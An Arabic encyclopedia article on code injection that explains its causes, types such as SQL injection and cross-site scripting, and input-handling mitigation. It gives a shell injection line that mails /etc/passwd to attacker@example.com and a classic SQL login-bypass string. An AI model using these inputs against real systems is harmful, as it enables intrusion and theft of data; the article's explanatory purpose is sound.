حقن النصوص البرمجية
حقن النصوص البرمجية [1] (بالإنجليزية: Code Injection) [2] [3] هي من إحدى الطرق لإيصال أو حقن الجمل البرمجية إلى برنامج أو نظام ما، مستفيداً من الافتراضات الخاطئة وغير المراقبة، التي يفترضها النظام متعلقاً بالإدخال الذي يتم لهذا النظام. السبب الرئيسي للبرمجة بالحقن هو تجنب أو تعديل الوظيفة الأساسية للبرنامج، للوصول إلى ما يحتاجه المخترق، وإذا كانت الوظيفة هي حفظ أمان النظام، فإن النتائج ستكون كارثية.
مثال بسيط على البرمجة بالحقن
عدلمعظم خادمات الويب تحتوي على «دفتر الزوار» لكتابة بعض الملاحظات، وهو ما يستقبل عادة رسائل صغيرة من المستخدمين، والتي من المكن أن تكون: «لقد زرت الموقع.. وكان رائعاً جداً».. ولكن المخترق ومن خلال هذه التقنية يستطيع أن يصل إلى معلومات ما على الجهاز الخادم، وذلك بإضافته لبعض الجمل البرمجية في هذه المساحة، والتي من الممكن أن تكون هذه الجملة:
; cat /etc/passwd | email attacker@example.com #
والتي من خلالها سيبعث جهاز الخادم بالملف المدعو (passwd) إلى بريد المخترق، مزودةً بجميع كلمات السر الموجودة عند الجهاز الخادم، وهو ما سيُحدث مشاكل كثيرة لزائري هذا الموقع. أغلب هذا المشاكل تحدث مرتبطة بالافتراضات الخاطئة – كما ذكرنا سابقاً- عن الإدخالات المحتملة للنظام، أو تأثير بعض البيانات على هذا النظام. وبعض الأمثلة على هذه الافتراضات التي يقوم مطور النظام عند الإدخال للبرنامج هي:
- افتراضات متعلقة ببعض الأحرف والأرقام التي ليس لها معنى مباشر، وإنما تحتوي على معاني مميزة للبرامج الحاسوبية، ويفترض عندها المبرمج أنها لن تستخدم للإدخال، ولكن المخترقين لكون لهم رأي آخر.
- الافتراض بأن الأرقام فقط تستخدم للإدخال.
- الافتراض بأن حجم الإدخال لن يتجاوز الحجم المحدد الذي وضعه المبرمج.
- الافتراض بأنه من الصحيح أن يتم استخدام المؤشرات أو أدلة المصفوفات من خلال الصندوق المخصص للإدخال.
- الافتراض بأن القيم المحددة من قبل الخادم للمستخدم، لا يمكن تغييرها بواسطة الأخير. وهذا الافتراض يقود لأخطار أخرى إضافة لخطر البرمجة بالحقن.[4][5][6]
استخدامات البرمجة بالحقن
عدلالاستخدام المتعمد
عدلأغراض تخريبية (Malevolent)
عدلالاستخدام الأساسي لهذه التقنية عادة ما يكون تخريبياً، فقد تستخدم البرمجة بالحقن في أوساط الأنظمة التخريبية أو التدميرية للحصول على معلومات أو امتيازات محددة أو الدخول للأماكن غير المسموح بها في أنظمة معينة. كما يمكن أن تستخدم البرمجة بالحقن تخريبياً للوصول إلى:
- تغيير بعض القيم بطريقة اعتباطية في قواعد البيانات عبر إحدى أنواع هذه التقنية والتي تدعى بـ (SQL Injection)، وتأثير هذا التخريب يتراوح بين تشويه المعلومات على الموقع، إلى الإطلاع على بعض المعلومات الحساسة.
- سرقة بعض المعلومات المخزنة على المواقع في الكعكات، من خلال لغات برمجة مثل HTML ، ويتم هذا خلال نوع مشهور من التخريب وهو البرمجة عبر المواقع.
- تنزيل بعض البرامج أو تنفيذ بعض الجمل البرمجية التخريبية على الخادم الرئيسي للموقع عير لغات برمجة مثل ASP وPHP.
أغراض غير تخريبية (Benevolent)
عدليمكن أن تستخدم هذا التقنية لأغراض خيرة، كأن يحاول مستخدم ما تعديل البرنامج وإضافة بعض الجمل إليه لتحسين أدائه وفعاليته، وخلال هذا الفعل فهو يساعد هذا النظام على تحسين نفسه بدون إيذاء أحد. ومن الأمثلة على ذلك إضافة عمود إلى صفحة نتائج البحث لم يكن موجوداً قبلاَ، ولكنه بذلك يوفر الكثير من الوقت والعمل. أو تنظيم البيانات أو تحسينها أو جمعها عبر حقل جديد لا يظهر علناً على الموقع. ويلجأ المستخدم عادةً لهذه التقنية لأحد الأسباب التالية:
- تعديل المنتج بالشكل المطلوب غير ممكن.
- تعديل المنتج مكلف بشكل يتجاوز الإمكانات المادية المتوفرة.
- تعديل المنتج يؤثر على أمور أخرى حساسة.
ولكن هذا الاستخدام لهذه التقنية مستنكر بشكل شديد في أوساط المبرمجين عامة، وما يزال يدعى بالاختراق أو الهجوم. لكن بعض البرمجيات تسمح أو حتى تحفز هذا النوع من البرمجة بالحقن لتحسين منتجاتهم، ويعزى هذا عادةً لكون هذه الطريقة هي أقل كلفة لتحسين المنتج بدلاً من شراء منتجات أخرى جديدة. وبشكل عام يبقى هذا الاستخدام لهذه التقنية غير مشجع.
استخدام غير متعمد
عدليمكن لبعض المستخدمين العاديين القيام بالبرمجة بالحقن بدون علمهم، من خلال قيامهم بإدخال بيانات لم يتم اعتبارها ممكنة الاستخدام من قبل مستخدمين عاديين من قِبل الذي طوروا النظام من البداية. فمثلاً:
بعض أنواع البرمجة بالحقن
عدل- SQL: يستفيد المخربين هنا من طريقة عمل هذه اللغة لحقن بعض الجمل البرمجية التي تهدف إلى قراءة أو تغيير بعض من قاعدة البيانات، أو لتغيير الهدف الرئيسي من بعض وظائف النظام. ومثال على ذلك، هي المعلومات للدخول إلى أي نظام والتي تتطلب اسم المستخدم وكلمة السر، وهناك يستطيع المخرب إدخال " password' OR '1'='1" مما يمكن المخرب بالدخول للنظام من دون أي كلمة سر.
- PHP وASP: يتمكن المخرب بهما من لإيصال الجمل البرمجية إلى جهاز الخادم مباشرة، وهنا عادة ما يستفيد المخربون من نقاط الضعف الموجودة على جهاز الخادم نفسه.
- HTML: وهنا يكون عمل المخرب من خلال ما يدعى بـ«البرمجة عبر الموقع»، وهو ما يمكن المخرب من إدخال الجمل البرمجية من خلال مواقع الإنترنت، وهناك نوعان من هذا الهجوم: متغير ولا يؤثر على جهاز الخادم، وثابت وهو الذي يغير البيانات على جهاز الخادم ذاته.
الحد من مشكلة البرمجة بالحقن
عدلللحد من البرمجة بالحقن، يتم إرفاق ما يدعى «معالجة آمنة لنظم الإدخال والإخراج» (Secure input and output handling)، التي تراقب كل ما يتم إدخاله إلى النظام وكل ما ينتج عنه.
انظر أيضاً
عدلمراجع
عدل- ^ "Top 10 Web Application Security Vulnerabilities". Penn Computing. University of Pennsylvania. مؤرشف من الأصل في 2018-02-24. اطلع عليه بتاريخ 2016-12-10.
- ^ Noman, Haitham Ameen; Abu-Sharkh, Osama M. F. (Jan 2023). "Code Injection Attacks in Wireless-Based Internet of Things (IoT): A Comprehensive Review and Practical Implementations". Sensors (بالإنجليزية). 23 (13): 6067. Bibcode:2023Senso..23.6067N. DOI:10.3390/s23136067. ISSN:1424-8220. PMC:10346793. PMID:37447915.
- ^ "NVD - Statistics Search". web.nvd.nist.gov. مؤرشف من الأصل في 2023-12-15. اطلع عليه بتاريخ 2016-12-09.
- ^ [أ] المعجم الموحد لمصطلحات تقانة (تكنولوجيا) المعلومات: (إنجليزي-فرنسي-عربي). سلسلة المعاجم الموحدة (36) (بالعربية والإنجليزية والفرنسية). الرباط: مكتب تنسيق التعريب. 2011. ص. 103. ISBN:978-9954-0-0742-6. OCLC:1413893208. QID:Q111267300. [ب] معجم الحاسبات (بالعربية والإنجليزية) (ط. 3). القاهرة: مجمع اللغة العربية بالقاهرة. 2003. ص. 258. ISBN:978-977-01-8550-6. OCLC:784561745. QID:Q113638576.
- ^ معجم المصطلحات المعلوماتية (بالعربية والإنجليزية)، دمشق: الجمعية العلمية السورية للمعلوماتية، 2000، ص. 482، OCLC:47938198، QID:Q108408025
- ^ # (22 يوليو 2020). "ما هو السيرفر Server؟ وما المقصود بخادم الويب؟". الافاضل التقني. مؤرشف من الأصل في 2020-10-13. اطلع عليه بتاريخ 2020-10-13.
{{استشهاد ويب}}
: الوسيط|الأخير=
يحوي أسماء رقمية (مساعدة)